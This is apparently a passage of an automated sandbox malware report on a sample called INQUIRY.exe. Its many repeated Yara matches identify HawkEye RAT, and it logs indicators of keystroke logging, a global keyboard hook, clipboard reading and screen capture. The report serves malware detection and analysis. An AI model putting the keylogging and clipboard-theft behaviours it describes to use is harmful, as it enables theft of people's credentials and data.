                    Source: Yara matchFile source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6776, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Contains functionality to log keystrokes (.Net Source)Show sources
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Installs a global keyboard hookShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004070D2 OpenClipboard,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004070D2 OpenClipboard,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004233B4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004233B4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004239F8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004239F8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00459724 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00459724 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
